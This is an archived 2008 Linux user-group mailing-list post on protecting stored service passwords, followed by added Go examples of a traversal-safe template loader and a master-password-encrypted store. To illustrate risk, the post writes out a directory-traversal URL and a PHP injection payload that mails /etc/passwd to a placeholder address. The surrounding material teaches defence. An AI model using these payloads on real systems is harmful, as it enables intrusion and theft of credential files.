[Klug-general] password / security question / coding

MacGyveR macgyver at thedumbterminal.co.uk
Sat Oct 18 22:40:21 UTC 2008


On Saturday 18 Oct 2008, oly wrote:
> On Sat, 2008-10-18 at 20:29 +0100, MacGyveR wrote:
> > On Saturday 18 Oct 2008, Mike Evans wrote:
> > > > Obviously storing in plain text is not ideal, so I'm looking for the most
> > > > secure solution, so let me know; I am not a security expert myself, so I'm
> > > > looking for others' opinions / ideas.
> > >
> > > Putting passwords in plain in a stored file is not only less than ideal
> > > it is folly.  Don't ever (and I mean ever) do it.  Even holding them in
> > > the memory of a computer in plain should be done for as short a time as
> > > possible.  This can be done by decrypting as late as possible, and once
> > > used ensuring that the memory used by the variable is overwritten.
> > >
> > > If possible I would also suggest that connectivity and authentication
> > > between a server manager and managed servers should be done using tried
> > > and tested security mechanisms, such as ssh validated by certificates
> > > in both directions.  Remember that once a hostile party has access to
> > > any machine on the network packet sniffing is trivial.
> > >
> > > Mike
> > >
> > >
> > > _______________________________________________
> > > Kent mailing list
> > > Kent at mailman.lug.org.uk
> > > https://mailman.lug.org.uk/mailman/listinfo/kent
> >
> > If we are just talking about one password, then I would not store it in
> > the app at all, as you could easily write a generic popup to request the
> > user to enter the password when required (say on reconfiguring some
> > service). The KDE root password pop-up is an example of this. I
> > personally would not allow this to be cached during the user's session,
> > but this may annoy users, so you might have a system setting and warning
> > dialog for this option.
>
> Popups were kind of what I wanted to avoid, but may be the route I end up
> going; however, it would be a pain in the neck to have to enter the
> password for each query on the LDAP server. You don't see the KDE or GNOME
> apps do this; they store the passwords for a set period, presumably in
> memory.
>
> > If you need credentials for lots of users I would store the passwords in
> > the required encrypted forms for all the services that need them, e.g.
> > crypt for system accounts and MySQL format for MySQL accounts. When a new
> > account is added the user will be prompted for the plain password and all
> > the encrypted passwords created. If you add a new service that needs a
> > different encryption type then the user will be prompted as necessary. I
> > can't see that Linux-based services will use that many different password
> > formats, as most support multiple authentication backends.
>
> I am actually already encrypting all passwords; it's only when connecting
> to services that I need the original password to authenticate.
> I can also set the initial passwords in any format already; it's more the
> connecting afterwards that's baffling me.
>
> Also, I understand why plain text is bad, but would you not have to have
> compromised a server to be able to read it? At which point surely you
> would be screwed. More a general question to help in my understanding.
>
>
>

Don't forget any web application can be a potential way into a server for an
attacker, as well as any listening daemons running on a box. If a web app can
read a file then the box does not need to be compromised for the attacker to
get the contents, just the app itself. Here is a really basic (and stupid)
example:

the logon url for an app is:
http://url/script.php?template=login.html

an attacker could try (dir traversal):
http://url/script.php?template=../../../../secret/passwd.txt

or even (code execution):
http://url/script.php?template=<?php
mail('a@a.com', '', file_get_contents('/etc/passwd')); ?>

These are lame examples, but hopefully they make the point.

You can't hide anything in your source, so details of where and how passwords
are stored will be found; when implementing security, following best
practices is the way to go.

How about using some kind of master password to encrypt the password storage,
like how Mozilla, Firefox etc. can store form passwords? As long as you use
strong encryption and don't store the key anywhere, it would make breaking
into that store an unfeasible option for an attacker.

-- 
--------------------------------
http://www.thedumbterminal.co.uk
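The "script.php?template=..." loader in the message above, worked through as an added example (not code from the post, and Go rather than PHP so it runs stand-alone). The function names, the throwaway directory layout and the file contents are all constructed for this illustration. The unsafe loader joins whatever the client sent onto the template directory; the hardened one only accepts names from an allowlist and then confirms the resolved path still sits under that directory, which rejects both the "../../secret/passwd.txt" traversal and the inline "<?php ... ?>" payload from the post.

```go
// Added example, not code from the mailing-list post: a Go stand-in for the
// "script.php?template=..." loader discussed above. The function names, the
// on-disk layout and the file contents are constructed for this example.
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Allowlist for template names: one path component, letters/digits/_/-,
// ending in ".html". "../x" and anything containing "<?php" cannot match.
var templateName = regexp.MustCompile(`^[A-Za-z0-9_-]+\.html$`)

// loadTemplateUnsafe mirrors the vulnerable loader: whatever the client sent
// is joined onto the template directory and read, so "../../secret/passwd.txt"
// walks straight out of the directory.
func loadTemplateUnsafe(root, name string) ([]byte, error) {
	return os.ReadFile(filepath.Join(root, name))
}

// loadTemplateSafe rejects anything outside the allowlist and, as defence in
// depth, checks that the joined path still resolves beneath root.
func loadTemplateSafe(root, name string) ([]byte, error) {
	if !templateName.MatchString(name) {
		return nil, errors.New("template name rejected by allowlist")
	}
	full := filepath.Join(root, name)
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return nil, errors.New("template path escapes the template directory")
	}
	return os.ReadFile(full)
}

// Constructed fixture contents (not real data).
const (
	loginTemplate = "<form>login</form>"
	secretFile    = "ldap-admin:s3cret\n"
)

// setupFixture builds a throwaway tree and returns the template directory:
//   <tmp>/app/templates/login.html   the legitimate template
//   <tmp>/secret/passwd.txt          the file the app must never hand out
func setupFixture() (string, func(), error) {
	tmp, err := os.MkdirTemp("", "tmpl-")
	if err != nil {
		return "", nil, err
	}
	cleanup := func() { os.RemoveAll(tmp) }
	root := filepath.Join(tmp, "app", "templates")
	secretDir := filepath.Join(tmp, "secret")
	for _, d := range []string{root, secretDir} {
		if err = os.MkdirAll(d, 0o755); err != nil {
			cleanup()
			return "", nil, err
		}
	}
	if err = os.WriteFile(filepath.Join(root, "login.html"), []byte(loginTemplate), 0o644); err != nil {
		cleanup()
		return "", nil, err
	}
	if err = os.WriteFile(filepath.Join(secretDir, "passwd.txt"), []byte(secretFile), 0o600); err != nil {
		cleanup()
		return "", nil, err
	}
	return root, cleanup, nil
}

func main() {
	root, cleanup, err := setupFixture()
	if err != nil {
		panic(err)
	}
	defer cleanup()
	// The three "template" values from the post: legitimate, traversal, inline code.
	for _, name := range []string{
		"login.html",
		"../../secret/passwd.txt",
		"<?php mail('a@a.com', '', file_get_contents('/etc/passwd')); ?>",
	} {
		u, uerr := loadTemplateUnsafe(root, name)
		s, serr := loadTemplateSafe(root, name)
		fmt.Printf("%q\n  unsafe: %q %v\n  safe:   %q %v\n", name, u, uerr, s, serr)
	}
}
```

The allowlist is what actually closes the hole; the filepath.Rel check is there so a later loosening of the pattern does not silently reopen it. Neither check follows symlinks, so a symlink planted inside the template directory would still be read; resolve with filepath.EvalSymlinks before the containment check if that matters in your deployment.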


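The master-password store suggested at the end of the message, as an added example (this is not code from the post, nor Mozilla's or Firefox's implementation). The function names, constants and the record sealed in the test are this example's own, and PBKDF2-HMAC-SHA256 is written out inline rather than taken from a library. The master password is stretched into an AES-256 key with a per-store salt, the store is encrypted with AES-GCM so any tampering is detected, and only salt, nonce and ciphertext are ever written out; the key exists in memory only while a seal or open is in progress.

```go
// Added example, not code from the post: a password store sealed under a key
// derived from a master password (PBKDF2-HMAC-SHA256 + AES-256-GCM).
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"errors"
)

const (
	saltLen    = 16
	nonceLen   = 12
	keyLen     = 32      // AES-256
	tagLen     = 16      // GCM tag
	iterations = 100_000 // deliberately slow: the per-guess cost for whoever steals the file
)

// pbkdf2HmacSha256 is PBKDF2 (RFC 8018 section 5.2) with HMAC-SHA256 as the PRF,
// written out because it is not in Go's standard library before 1.24:
// T_i = U_1 xor ... xor U_c, U_1 = PRF(salt || INT(i)), U_j = PRF(U_{j-1}).
func pbkdf2HmacSha256(password, salt []byte, iter, dkLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var dk []byte
	for block := uint32(1); len(dk) < dkLen; block++ {
		var idx [4]byte
		binary.BigEndian.PutUint32(idx[:], block)
		prf.Reset()
		prf.Write(salt)
		prf.Write(idx[:])
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:dkLen]
}

// kdfKnownAnswer checks the KDF against the published vector
// PBKDF2-HMAC-SHA256("password", "salt", c=1, dkLen=32).
func kdfKnownAnswer() bool {
	got := hex.EncodeToString(pbkdf2HmacSha256([]byte("password"), []byte("salt"), 1, 32))
	return got == "120fb6cffcf8b32c43e7225256c4f837a86548c92ccc35480805987cb70be17b"
}

// zero wipes key material once it is no longer needed (best effort: the
// runtime may already have copied it, so keep the window short).
func zero(b []byte) {
	for i := range b {
		b[i] = 0
	}
}

// deriveAEAD turns the master password plus salt into an AES-256-GCM instance.
// The caller zeroes the returned key when done.
func deriveAEAD(master string, salt []byte) ([]byte, cipher.AEAD, error) {
	key := pbkdf2HmacSha256([]byte(master), salt, iterations, keyLen)
	block, err := aes.NewCipher(key)
	if err != nil {
		zero(key)
		return nil, nil, err
	}
	aead, err := cipher.NewGCM(block)
	return key, aead, err
}

// sealStore returns salt || nonce || ciphertext+tag; salt and nonce are bound
// into the tag as additional data. Nothing derived from the password is stored.
func sealStore(master string, plaintext []byte) ([]byte, error) {
	hdr := make([]byte, saltLen+nonceLen)
	if _, err := rand.Read(hdr); err != nil {
		return nil, err
	}
	key, aead, err := deriveAEAD(master, hdr[:saltLen])
	if err != nil {
		return nil, err
	}
	defer zero(key)
	out := append([]byte(nil), hdr...)
	return aead.Seal(out, hdr[saltLen:], plaintext, hdr), nil
}

// openStore re-derives the key from the stored salt and fails closed on a
// wrong master password or any modification of the blob.
func openStore(master string, blob []byte) ([]byte, error) {
	if len(blob) < saltLen+nonceLen+tagLen {
		return nil, errors.New("store too short to be valid")
	}
	hdr := blob[:saltLen+nonceLen]
	key, aead, err := deriveAEAD(master, hdr[:saltLen])
	if err != nil {
		return nil, err
	}
	defer zero(key)
	pt, err := aead.Open(nil, hdr[saltLen:], blob[saltLen+nonceLen:], hdr)
	if err != nil {
		return nil, errors.New("wrong master password or store tampered with")
	}
	return pt, nil
}
```

Two caveats a practitioner should keep in mind. First, zeroing the key slice is only partial hygiene: the AES object keeps its expanded key schedule until it is garbage collected, which is the same point Mike made about holding plaintext in memory for as short a time as possible. Second, this only works if the master password is typed in, which brings the thread back to the popup question: the moment the derived key is cached on disk to avoid prompting, the store is no better than the plain-text file it replaced. Where a memory-hard KDF (scrypt, Argon2) is available, prefer it over PBKDF2.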
